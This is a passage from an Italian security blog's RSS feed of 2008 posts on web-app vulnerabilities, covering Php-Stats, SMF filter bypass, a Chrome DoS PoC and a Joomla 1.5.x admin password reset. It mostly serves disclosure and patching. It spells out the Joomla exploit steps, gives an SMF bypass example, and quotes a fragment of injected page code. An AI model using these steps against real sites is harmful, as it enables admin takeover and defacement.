                        <span style="color: #b1b100;">if</span> <span style="color: #009900;">&#40;</span><span style="color: #990000;">stristr</span><span style="color: #009900;">&#40;</span><span style="color: #000088;">$buffer</span><span style="color: #339933;">,</span> <span style="color: #0000ff;">'&lt;/html'</span><span style="color: #009900;">&#41;</span> <span style="color: #339933;">!==</span> <span style="color: #009900; font-weight: bold;">FALSE</span><span style="color: #009900;">&#41;</span>
                        <span style="color: #009900;">&#123;</span>
                                <span style="color: #b1b100;">return</span> <span style="color: #990000;">eregi_replace</span><span style="color: #009900;">&#40;</span><span style="color: #0000ff;">'&lt;/html'</span><span style="color: #339933;">,</span> <span style="color: #000088;">$update</span><span style="color: #339933;">.</span><span style="color: #0000ff;">'&lt;html'</span><span style="color: #339933;">,</span> <span style="color: #000088;">$buffer</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
                        <span style="color: #009900;">&#125;</span>
                        <span style="color: #b1b100;">else</span>
                        <span style="color: #009900;">&#123;</span>
                                <span style="color: #b1b100;">return</span> <span style="color: #000088;">$buffer</span><span style="color: #339933;">.</span><span style="color: #000088;">$update</span><span style="color: #339933;">;</span>
                        <span style="color: #009900;">&#125;</span>
                <span style="color: #009900;">&#125;</span>
                <span style="color: #000000; font-weight: bold;">?&gt;</span></pre></td></tr></table></div>

<h1>Possibilità di infezione</h1>
<p>Non ho determinato, per ora, se l'infezione avviene tramite una vulnerabilità del proprio applicativo web o se invece avviene via Ftp sfruttando le credenziali del proprio Client Ftp.</p>
<p>In ambo i casi i consigli sono sempre gli stessi e fanno sempre bene:</p>
<p>1) Verificare presso siti di sicurezza come <a href="http://secunia.com/" target="_blank"><strong>Secunia</strong></a> o <a href="http://www.securityfocus.com/" target="_blank"><strong>SecurityFocus</strong></a> o <a href="http://www.milw0rm.com/" target="_blank"><strong>Milw0rm</strong> </a>eventuali nuove vulnerabilità dei propri applicativi/script/cms.</p>
<p>2) Eseguire periodicamente <strong>scansioni complete dei propri PC con software AntiMalware,AntiSpyware, etc</strong>. In particolare consiglio l'utilizzo di <a href="http://www.malwarebytes.org/mbam.php" target="_blank"><strong>Malwarebytes' Anti-Malware</strong></a> che  include tutte queste protezioni in un unica soluzione</p>
<p>Chiunque abbia informazioni al riguardo e volesse condividerle mi scriva all'indirizzo <a href="mailto:capn3m0@capn3m0.org"><strong>capn3m0@capn3m0.org</strong></a></p>
<p><br class="spacer_" /></p>
<p><strong>AGGIORNAMENTO DELL'8/11/2009:</strong> <a href="http://www.capn3m0.org/hack-cannot-redeclare-security_update.html" target="_self">[HACK] – Cannot redeclare security_update(), alla fine è arrivato!</a></p>
<p><br class="spacer_" /></p>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/18446744073709551615-un-nuovo-hack-in-arrivo.html/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>[EXPLOIT/FIX] Php-Stats 0.1.9.2 Multiple Vulnerabilities Exploit</title>
		<link>http://www.capn3m0.org/exploitfix-php-stats-0192-multiple-vulnerabilities-exploit.html</link>
		<comments>http://www.capn3m0.org/exploitfix-php-stats-0192-multiple-vulnerabilities-exploit.html#comments</comments>
		<pubDate>Sat, 11 Oct 2008 23:20:51 +0000</pubDate>
		<dc:creator>capn3m0</dc:creator>
				<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Vulnerabilità]]></category>
		<category><![CDATA[code execution]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[Milworm]]></category>
		<category><![CDATA[php stats]]></category>
		<category><![CDATA[sql injection]]></category>
		<category><![CDATA[vulnerabilità]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/?p=98</guid>
		<description><![CDATA[In questi giorni sto lavorando ad un &#8220;caso&#8221; di hacking che sta infettando un discreto numero di persone e facendo i soliti controlli mi sono imbattuto in una serie di vulnerabilità che affliggono il famoso script di statistiche Php-Stats 0.1.9.2 (utilizzato anche in questo Blog). Le vulnerabilità sono di due tipi: Blind SQL Injection e [...]]]></description>
			<content:encoded><![CDATA[<p>In questi giorni sto lavorando ad un &#8220;caso&#8221; di hacking che sta infettando un discreto numero di persone e facendo i soliti controlli mi sono imbattuto in una serie di vulnerabilità che affliggono il famoso script di statistiche <a href="http://php-stats.com/" target="_blank"><strong>Php-Stats 0.1.9.2</strong></a> (utilizzato anche in questo Blog).</p>
<p><span id="more-98"></span></p>
<p>Le vulnerabilità sono di due tipi: <a href="http://en.wikipedia.org/wiki/SQL_injection#Blind_SQL_Injection" target="_blank"><strong>Blind SQL Injection</strong></a> e <a href="http://en.wikipedia.org/wiki/Arbitrary_code_execution" target="_blank"><strong>Remote Code Execution</strong></a>.</p>
<p>Tale vulnerabilità è stata riportata da <a href="http://www.milw0rm.com" target="_blank"><strong>Milworm</strong></a> e <a href="http://www.milw0rm.com/exploits/4513" target="_blank"><strong>questo</strong></a> è l&#8217;indirizzo dell&#8217;Exploit.</p>
<p><a href="mailto:n0b0d13s@gmail.com "><strong>Egix</strong></a>, lo scopritore di tale vulnerabilità riporta anche un fix da applicare al file &#8220;<strong>php-stats.recjs.php</strong>&#8221; al fine di correggere tale falla di sicurezza.</p>
<p>Per fixare il vostro <strong>Php-Stats</strong> aprite il file &#8220;<strong>php-stats.recjs.php</strong>&#8221; e posizionatevi alla <strong>Riga 94</strong>. Troverete il seguente codice:</p>
<blockquote><p><strong>if(isset($_GET['ip'])) $ip=urldecode($_GET['ip']); else break;</strong></p>
</blockquote>
<p>che andrà sostituito con questo:</p>
<blockquote><p><strong>if(isset($_GET['ip'])) $ip=intval(urldecode($_GET['ip'])); else break;</strong></p>
</blockquote>
<p>Come sempre eccovi il file già fixato:</p>
<p><strong><a href="http://www.capn3m0.org/wp-content/uploads/2008/10/php-statsrecjs.rar">Fix Php-Stats 0.1.9.2</a></strong></p>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/exploitfix-php-stats-0192-multiple-vulnerabilities-exploit.html/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>[VULN/EXPLOIT] SMF 1.1.6 Filter Post Bypass &#8211; Milw0rm</title>
		<link>http://www.capn3m0.org/vulnerabilita-exploit-smf-116-filter-post-bypass-milw0rm.html</link>
		<comments>http://www.capn3m0.org/vulnerabilita-exploit-smf-116-filter-post-bypass-milw0rm.html#comments</comments>
		<pubDate>Sun, 05 Oct 2008 00:05:59 +0000</pubDate>
		<dc:creator>capn3m0</dc:creator>
				<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Vulnerabilità]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[milw0rm]]></category>
		<category><![CDATA[simple machine forum]]></category>
		<category><![CDATA[smf]]></category>
		<category><![CDATA[vulnerabilità]]></category>
		<category><![CDATA[WHK]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/?p=96</guid>
		<description><![CDATA[E&#8217; stata pubblicata da poco (4/10/2008) una vulnerabilità scoperta nella versione 1.1.6 di Simple Machine Forum (o SMF) che permette di bypassare il Filtro che viene applicato al contenuto del post dando la possibilità di scrivere parole censurate, url di siti correttamente funzionanti e visibili, etc. Questo l&#8217;Exploit pubblicato su Milw0rm: Name: SMF 1.1.6 Filter [...]]]></description>
			<content:encoded><![CDATA[<p>E&#8217; stata pubblicata da poco (4/10/2008) una vulnerabilità scoperta nella versione <strong>1.1.6</strong> di <strong><a href="http://www.simplemachines.org/" target="_blank">Simple Machine Forum</a> (o SMF)</strong> che permette di <strong>bypassare</strong> il Filtro che viene applicato al contenuto del post dando la possibilità di scrivere parole censurate, url di siti correttamente funzionanti e visibili, etc.</p>
<p><span id="more-96"></span></p>
<p><a href="http://www.milw0rm.com/exploits/6665" target="_blank">Questo</a> l&#8217;Exploit pubblicato su <a href="http://www.milw0rm.com/" target="_blank"><strong>Milw0rm</strong></a>:</p>
<blockquote><p>Name: SMF 1.1.6 Filter Post Bypass<br />
 Author: WHK<br />
 WebSite: http://www.jccharry.com/</p>
<p>en{<br />
 The data in a post are not filtered properly when someone enters<br />
 statements BBCode wrong without content that a user can enter<br />
 words banned by the system of restrictions by allowing expose<br />
 SPAM content, and so on.<br />
 }</p>
<p>es{<br />
 Los datos en un post no son filtrados adecuadamente cuando alguien<br />
 ingresa declaraciones bbcode sin contenido probocando que un<br />
 usuario pueda ingresar palabras prohibidas por el sistema de<br />
 restricciones permitiendo exponer contenido SPAM, etc.<br />
 }</p>
<p>Example of a post / Ejemplo de un post:</p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<br />
 [color=red][size=20pt]Fu[url][/url]ck you admin![/size][/color]</p>
<p>My SPAM: [b]ht[b][/b]tp://www.jc[i][/i]charry.com/[/b] &gt;:D<br />
 &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;</p>
<p>Demo:</p>
<p>http://www.jccharry.com/archivos_publicos/smf_filter_post_bypass.png</p>
<p># milw0rm.com [2008-10-04]</p>
</blockquote>
<p>Viene spiegato che &#8220;<em>&#8230;i dati in un post non vengono filtrati correttamente quando vengono inseriti alcuni tag BBCode errati permettendo così di inserire parole (o tutto ciò che è ritenuto SPAM) bypassando il Filtro AntiSpam..</em>&#8220;.</p>
<p>L&#8217;autore dell&#8217;exploit, tale <a href="http://www.jccharry.com/ " target="_blank"><strong>WHK</strong></a>, allega poi l&#8217;immagine seguente dove riporta sia il metodo con cui ha inserito il testo ed i BBcode nel Post, sia il risultato finale.</p>
<div id="attachment_97" class="wp-caption alignnone" style="width: 310px"><a href="http://www.capn3m0.org/wp-content/uploads/2008/10/smf_filter_post_bypass.png" rel="lightbox[96]" title="smf_filter_post_bypass"><img class="size-medium wp-image-97" title="smf_filter_post_bypass" src="http://www.capn3m0.org/wp-content/uploads/2008/10/smf_filter_post_bypass-300x248.png" alt="[VULN/EXPLOIT] SMF 1.1.6 Filter Post Bypass   Milw0rm" width="300" height="248" /></a><p class="wp-caption-text">Esempio pubblicato dall&#39;autore</p></div>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/vulnerabilita-exploit-smf-116-filter-post-bypass-milw0rm.html/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>[EXPLOIT] Google Chrome Browser &#8211; Milw0rm</title>
		<link>http://www.capn3m0.org/google-chrome-browser-exploit-milw0rm.html</link>
		<comments>http://www.capn3m0.org/google-chrome-browser-exploit-milw0rm.html#comments</comments>
		<pubDate>Thu, 25 Sep 2008 00:09:04 +0000</pubDate>
		<dc:creator>capn3m0</dc:creator>
				<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[Browser]]></category>
		<category><![CDATA[Chrome]]></category>
		<category><![CDATA[crash]]></category>
		<category><![CDATA[DoS]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[Google]]></category>
		<category><![CDATA[JavaScript]]></category>
		<category><![CDATA[milw0rm]]></category>
		<category><![CDATA[screenshot]]></category>
		<category><![CDATA[script]]></category>
		<category><![CDATA[security exploit]]></category>
		<category><![CDATA[taskmanager]]></category>
		<category><![CDATA[vulnerabilità]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/?p=58</guid>
		<description><![CDATA[Vi segnalo un&#8217;exploit che è stato pubblicato oggi sull&#8217;autorevole sito Milw0rm riguado il noto Browser Google Chrome che, tengo a precisare, è ancora in versione Beta. Tale Exploit è un DoS PoC (Proof Of Concept) che sfruttando la funzione &#8220;alert&#8221; del JavaScript opportunamente formattata consente di far aumentare il carico in memoria di Google Chrome [...]]]></description>
			<content:encoded><![CDATA[<p>Vi segnalo un&#8217;<a href="http://www.milw0rm.com/exploits/6554" target="_blank">exploit</a> che è stato pubblicato oggi sull&#8217;autorevole sito <a href="http://www.milw0rm.com/" target="_blank">Milw0rm</a> riguado il noto Browser <a href="http://www.google.com/chrome" target="_blank">Google Chrome</a> che, tengo a precisare, è ancora in versione Beta.</p>
<p>Tale Exploit è un <a href="http://it.wikipedia.org/wiki/Denial_of_service" target="_blank">DoS</a> <a href="http://it.wikipedia.org/wiki/Proof_of_concept" target="_blank">PoC (Proof Of Concept)</a> che sfruttando la funzione &#8220;alert&#8221; del JavaScript opportunamente formattata consente di far aumentare il carico in memoria di Google Chrome in pochi secondi causando un crash dell&#8217;applicativo. Ricorda come realizzazione quei JavaScript che venivano utilizzati forse 10 anni fa per far crashare i Browser (o in certi casi il Pc) generando un loop di apertura di PopUp.</p>
<p>Per chi volesse testarlo sulla propria pelle ecco l&#8217;Exploit versione Html e, successivamente, compresso con WinRar (non vorrei farvi crashare i PC  <img src='http://www.capn3m0.org/wp-includes/images/smilies/icon_smile.gif' alt="[EXPLOIT] Google Chrome Browser   Milw0rm" class='wp-smiley' title="[EXPLOIT] Google Chrome Browser   Milw0rm pics" />  ):</p>
<p><a href="http://www.capn3m0.org/wp-content/uploads/2008/09/chrome-6554.rar">Exploit Google Chrome &#8211; Milw0rm 6554</a></p>
<p>Ed eccovi alcuni screenshot del TaskManager di Chrome durante le prove.</p>
<div id="attachment_60" class="wp-caption alignnone" style="width: 310px"><a href="http://www.capn3m0.org/wp-content/uploads/2008/09/3.jpg" rel="lightbox[58]" title="Google Chrome Normal Activity - TaskManager"><img class="size-medium wp-image-60" title="Google Chrome Normal Activity - TaskManager" src="http://www.capn3m0.org/wp-content/uploads/2008/09/3-300x192.jpg" alt="[EXPLOIT] Google Chrome Browser   Milw0rm" width="300" height="192" /></a><p class="wp-caption-text">Stato del TaskManager di Chrome appena avviato</p></div>
<p>Dopo 15 secondi la situazione era questa:</p>
<p><span id="more-58"></span></p>
<div id="attachment_61" class="wp-caption alignnone" style="width: 310px"><a href="http://www.capn3m0.org/wp-content/uploads/2008/09/5.jpg" rel="lightbox[58]" title="Google Chrome DoS dopo 15 sec - TaskManager"><img class="size-medium wp-image-61" title="Google Chrome DoS dopo 15 sec - TaskManager" src="http://www.capn3m0.org/wp-content/uploads/2008/09/5-300x192.jpg" alt="[EXPLOIT] Google Chrome Browser   Milw0rm" width="300" height="192" /></a><p class="wp-caption-text">Lo stato della memoria dal TaskManager di Google Chrome dopo circa 15 secondi dal caricamento dell&#39;Exploit</p></div>
<p>Aspettando qualche minuto la memoria Ram del proprio Pc sarà satura e Google Chrome andrà in errore<br class="spacer_" /></p>
<div id="attachment_62" class="wp-caption alignnone" style="width: 310px"><a href="http://www.capn3m0.org/wp-content/uploads/2008/09/6.jpg" rel="lightbox[58]" title="Google Chrome Crash"><img class="size-medium wp-image-62" title="Google Chrome Crash" src="http://www.capn3m0.org/wp-content/uploads/2008/09/6-300x207.jpg" alt="[EXPLOIT] Google Chrome Browser   Milw0rm" width="300" height="208" /></a><p class="wp-caption-text">Il risultato di poco più di un minuto di attività dell&#39;Exploit</p></div>
<p>L&#8217;unica cosa che mi permetto di osservare è che durante la navigazione, se si incappa in un sito contenente tale Exploit, potrebbe capitare di non accorgersi di quanto sta accadendo poiché, mentre Mozilla FireFox segnala e blocca l&#8217;apertura del Popup, in Google Chrome appare una barra in basso che, a mio avviso, non si nota particolarmente.</p>
<p>Rimango fiducioso verso gli Sviluppatori Google e come detto all&#8217;apertura di questo articolo tengo a sottolineare che stiamo parlando di una versione Beta. Penso che in occasione della primea Release Stabile questo genere di errori e falle saranno risolte a vantaggio di un nuovo concetto di Browser  <img src='http://www.capn3m0.org/wp-includes/images/smilies/icon_biggrin.gif' alt="[EXPLOIT] Google Chrome Browser   Milw0rm" class='wp-smiley' title="[EXPLOIT] Google Chrome Browser   Milw0rm pics" />  <br class="spacer_" /></p>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/google-chrome-browser-exploit-milw0rm.html/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>[EXPLOIT] Joomla 1.5.x Remote Admin Password Change</title>
		<link>http://www.capn3m0.org/joomla-15x-remote-admin-password-change.html</link>
		<comments>http://www.capn3m0.org/joomla-15x-remote-admin-password-change.html#comments</comments>
		<pubDate>Sun, 14 Sep 2008 16:26:35 +0000</pubDate>
		<dc:creator>capn3m0</dc:creator>
				<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Programmazione]]></category>
		<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[Vulnerabilità]]></category>
		<category><![CDATA[defacement]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[joomla]]></category>
		<category><![CDATA[joomla 1.5 vulnerabilities]]></category>
		<category><![CDATA[php]]></category>
		<category><![CDATA[script php cms]]></category>
		<category><![CDATA[security exploit]]></category>
		<category><![CDATA[vulnerabilità]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/2008/09/joomla-15x-remote-admin-password-change/</guid>
		<description><![CDATA[In data 12 Agosto è stata scoperta una vulnerabilità del Cms Joomla versioni inferiori alla 1.5.6 che consente di sfruttare il componente &#8220;com_user&#8221; per editare a proprio piacimento la password di Administrator e, quindi, di sfruttare l&#8217;accesso Admin per eseguire defacement e simili. Al link seguente troverete l&#8217;annuncio ufficiale: http://developer.joomla.org/security/news/241-20080801-core-password-remind-functionality.html Questo, invece, quello dal Sito [...]]]></description>
			<content:encoded><![CDATA[<p>In data 12 Agosto è stata scoperta una vulnerabilità del Cms Joomla versioni inferiori alla 1.5.6 che consente di sfruttare il componente &#8220;com_user&#8221; per editare a proprio piacimento la password di Administrator e, quindi, di sfruttare l&#8217;accesso Admin per eseguire defacement e simili.</p>
<p>Al link seguente troverete l&#8217;annuncio ufficiale:</p>
<p><a href="http://developer.joomla.org/security/news/241-20080801-core-password-remind-functionality.html" target="_blank">http://developer.joomla.org/security/news/241-20080801-core-password-remind-functionality.html</a></p>
<p>Questo, invece, quello dal Sito Italiano:</p>
<p><a href="http://www.joomlaitalia.com/content/view/323/90/" target="_blank">http://www.joomlaitalia.com/content/view/323/90/</a></p>
<p><span id="more-3"></span>Sfruttare tale vulnerabilità risulta alquanto semplice poiché bastano pochi semplici passaggi per eseguire il reset:</p>
<p>1) Una volta individuato il Sito in Joomla caricare questo Url:</p>
<blockquote><p>/index.php?option=com_user&amp;view=reset&amp;layout=confirm</p>
</blockquote>
<p>2) A questo punto apparirà un form che chiederà l&#8217;inserimento di un codice che, teoricamente, avreste dovuto ricevere in mail</p>
<p>3) Inserite l&#8217;apice (&#8216;) come carattere continuate</p>
<p>4) A questo punto avrete il campo di cambio password e, inserendola, editerete direttamente il profilo Administrator <img src='http://www.capn3m0.org/wp-includes/images/smilies/icon_wink.gif' alt="[EXPLOIT] Joomla 1.5.x Remote Admin Password Change" class='wp-smiley' title="[EXPLOIT] Joomla 1.5.x Remote Admin Password Change pics" /> </p>
<p>Il supporto Joomla individuata la vulnerabilità (la variabile token non veniva correttamente verificata) ha provveduto a rilasciare in tempi da record la versione 1.5.6 con tale problema fixato. Dalla sua uscita sono stati scoperti ulteriori vulnerabilità che han portato alla release 1.5.7 in pochi giorni:</p>
<p>Potete scaricare dai seguenti link questa versione:</p>
<p><a href="http://joomlacode.org/gf/download/frsrelease/8376/30993/Joomla_1.5.7-Stable-Full_Package.zip" target="_blank">Joomla 1.5.7 Full Eng</a></p>
<p><a href="http://download.joomla.it/index.php?option=com_docman&amp;task=doc_download&amp;gid=717&amp;&amp;Itemid=2" target="_blank">Joomla 1.5.7 Full Ita</a></p>
<p>Per chi avesse subito un&#8217;hacking sfruttando questa vulnerabilità consiglio di aggiornare a questa versione e, nel caso siano ancora visibili &#8220;tracce&#8221; (home page cambiate) dell&#8217;hacker ho notato, per esperienza, che le pagine maggiormente colpite sono 3:</p>
<ul>
<li>configuration.php</li>
<li>index.php (del template attivo nel Cms)</li>
<li>la cartella &#8220;cache&#8221; (consiglio di svuotarla)</li>
</ul>
<p>Provvedete a ripristinare le originali e il problema è risolto.</p>
<p>Dato che trovere il vostro account Admin non accessibile visto che è stata cambiata la password sarà necessario effettuare l&#8217;accesso direttamente al PhpMyAdmin e riscrivere la password nel Database.</p>
<p>Una guida a questa operazione la potete trovare <a href="http://wiki.joomla.it/index.php?title=Recupero_password_admin" target="_blank">qui</a>.</p>
<p>Per chi non avesse sbattimento ho fatto uno scriptino veloce veloce che fa la stessa cosa. Basta copiare il file nella root della vostra installazione Joomla, richiamarlo da Browser e impostare la password.</p>
<p>Il file lo potete scaricare dal seguente link:</p>
<p><a href="http://www.capn3m0.org/wp-content/uploads/2008/09/change_pwd.rar">Joomla Change Admin Password</a></p>
<p>Infine, x chi ha molto sbattimento, di seguito la guida a come fixare tale vulnerabilità manualmente.</p>
<ol>
<li>Aprire il file &#8220;/components/com_user/models/reset.php&#8221;</li>
<li>Posizionarsi alla riga 113 dopo la riga &#8220;global $mainframe;&#8221; ed inserire il seguente codice<br />
<blockquote><p><strong>if(strlen($token) != 32) {<br />
 $this-&gt;setError(JText::_(&#8216;INVALID_TOKEN&#8217;));<br />
 return false;<br />
 }</strong></p>
</blockquote>
</li>
<li>
<pre>Fine dei giochi! <img src='http://www.capn3m0.org/wp-includes/images/smilies/icon_biggrin.gif' alt="[EXPLOIT] Joomla 1.5.x Remote Admin Password Change" class='wp-smiley' title="[EXPLOIT] Joomla 1.5.x Remote Admin Password Change pics" /> </pre>
</li>
</ol>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/joomla-15x-remote-admin-password-change.html/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

<!-- Served from: www.capn3m0.org @ 2012-02-09 05:17:26 by W3 Total Cache -->
